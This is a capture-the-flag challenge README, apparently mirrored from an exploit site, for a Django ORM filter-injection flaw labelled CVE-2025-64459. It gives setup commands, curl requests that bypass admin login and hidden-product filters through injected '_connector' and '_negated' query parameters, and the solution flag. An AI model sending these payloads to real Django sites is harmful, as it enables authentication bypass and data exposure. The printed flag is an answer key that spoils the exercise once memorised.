Share
## https://sploitus.com/exploit?id=8E00D512-AF9D-5F35-87F7-6B494B2695C0
# CTF Challenge: Django ORM Injection (CVE-2025-64459)
**Category:** Web Security
**Difficulty:** Medium
**Vulnerability:** CVE-2025-64459 - Django ORM Filter Injection
## ๐ Description
> We built a secure merch shop with admin panel. Can you bypass the authentication and find the private admin note
**URL:** http://YOUR_SERVER:6008
## ๐ Deployment
```bash
cd web_django_cve
docker-compose up --build -d
```
## ๐ฏ Exploits (CVE-2025-64459)
### Auth Bypass (/login/)
```bash
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"
# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"
```
### Product Filter Bypass (/)
```bash
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"
# Direct access
curl "http://HOST:8054/?is_public=False"
```
## ๐ Flag
lol-you-here_then-you_exploited_me